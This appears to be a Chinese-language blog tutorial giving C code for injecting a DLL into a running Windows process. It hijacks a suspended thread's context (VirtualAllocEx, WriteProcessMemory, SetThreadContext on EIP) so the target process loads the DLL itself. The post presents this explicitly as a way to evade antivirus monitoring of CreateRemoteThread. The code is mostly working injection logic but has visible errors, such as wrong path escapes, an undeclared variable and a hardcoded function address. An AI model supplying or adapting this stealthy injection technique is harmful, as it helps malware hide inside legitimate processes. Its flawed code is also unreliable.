windows下注入dll的技術(windows下注入dll的技術)
目前windows下注入dll的技術大體上就是兩種
1:鉤子 SetWindowsHook
2:建立遠端執行緒 CreateRemoteThread
儘管都能實現遠端注入dll,但都難逃防毒軟體的法眼,特別是 CreateRemoteThread
一般都被防毒軟體監控的很牢,這裡提供一個巧妙的方法能夠利用目標程序(確切地說是執行緒)
自己主動呼叫LoadLibrary裝載dll.
我們想一想,windows下vc偵錯程式可以除錯正在執行的程序,功能很是強大,那可不可以
借鑑偵錯程式的機理呢?完全可以,偵錯程式的機理大致分為以下幾步:
1:OpenProcess() 獲取目標程序句炳,擁有除錯許可權(我們這裡不需要用這個許可權)
2:SuspendThread() 掛起目標程序的主執行緒
3:GetThreadContext(), SetThreadContext() 讀寫目標執行緒的當前CPU上下文資訊。
4:ReadProcessMemory(), WriteProcessMemory() 讀寫目標程序記憶體資料。
好了,這裡面就給我們提供了很好的方法,是什麼?對了就是 GetThreadContext(), SetThreadContext()
這兩個API函式,它倆不但是哥們,也是我們最好的朋友(親一下)。
下面給出程式碼:
1:我們自己的dll
BOOL APIENTRY DllMain( HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved
{
//很簡單,我們不搞破壞,緊緊彈個資訊框。
::MessageBox(0,"嘿嘿嘿!!!",0,0);
return TRUE;
}
2:我們的主程式
typedef HMODULE (__stdcall *pLoadLibrary)(LPCSTR lpLibFileName);
void test()
{
//不能直接使用常量字串,否則會引起目標程序讀取資料異常。
char dllname[] = {'c',':','//','d','l','l','t','e','s','t','.','d','l','l','/0'};
//必須用2088770939這個 LoadLibrary 函式的絕對地址(在我的xp下是這個地址,使用時應該在自己的windows下獲取)
pLoadLibrary pFunc = pLoadLibrary(2088770939);
//呼叫LoadLibrary,因為LoadLibrary函式在windows下每個程序中絕對地址都是一樣的。
pFunc(dllname);
return;
}
//以下是控制注入的函式
#include <windows.h>
void Inject()
{
CONTEXT context;
memset(&context,0,sizeof(context));
context.ContextFlags = CONTEXT_CONTROL;
PROCESS_INFORMATION piProcInfo;
STARTUPINFO siStartInfo;
ZeroMemory( &piProcInfo, sizeof(PROCESS_INFORMATION) );
ZeroMemory( &siStartInfo, sizeof(STARTUPINFO));
siStartInfo.cb = sizeof(STARTUPINFO);
BOOL bOk = CreateProcess(NULL,
"C://WINDOWS//system32//notepad.exe", // command line
NULL, // process security attributes
NULL, // primary thread security attributes
FALSE, // handles are inherited
0, // creation flags
NULL, // use parent's environment
"C://WINDOWS//system32//",// use parent's current directory
&siStartInfo, // STARTUPINFO pointer
&piProcInfo); // receives PROCESS_INFORMATION
::WaitForInputIdle(piProcInfo.hProcess,-1);
//為目標程序分配空間
LPVOID pRemote = ::VirtualAllocEx(piProcInfo.hProcess,0,4096,MEM_RESERVE|MEM_COMMIT,PAGE_EXECUTE_READWRITE);
DWORD dWriten = 0,id = 0;
//將test函式寫入目標程序
::WriteProcessMemory(piProcInfo.hProcess,pRemote,(LPVOID)test,1024,&dWriten);
//掛起目標程序的主執行緒
::SuspendThread(piProcInfo.hThread);
//獲取目標執行緒的CPU上下文資訊
i = ::GetThreadContext(piProcInfo.hThread,&context);
//更改Eip指令為我們拷貝好的test函式
context.Eip = (long)pRemote;
//設定目標執行緒的CPU上下文資訊
i = ::SetThreadContext(piProcInfo.hThread,&context);
//喚醒目標執行緒,
::ResumeThread(piProcInfo.hThread);
//目標執行緒此時就會執行我們的test函數了,執行完後還會繼續沿著
//自己原先的程式碼序列執行下去。
return 0;
}
以上程式碼都經過測試,的確比較“不動聲色”的完成了dll的注入,防毒軟體
也不會有所覺察(除非定時掃描程序dll模組。那系統會比較慢)。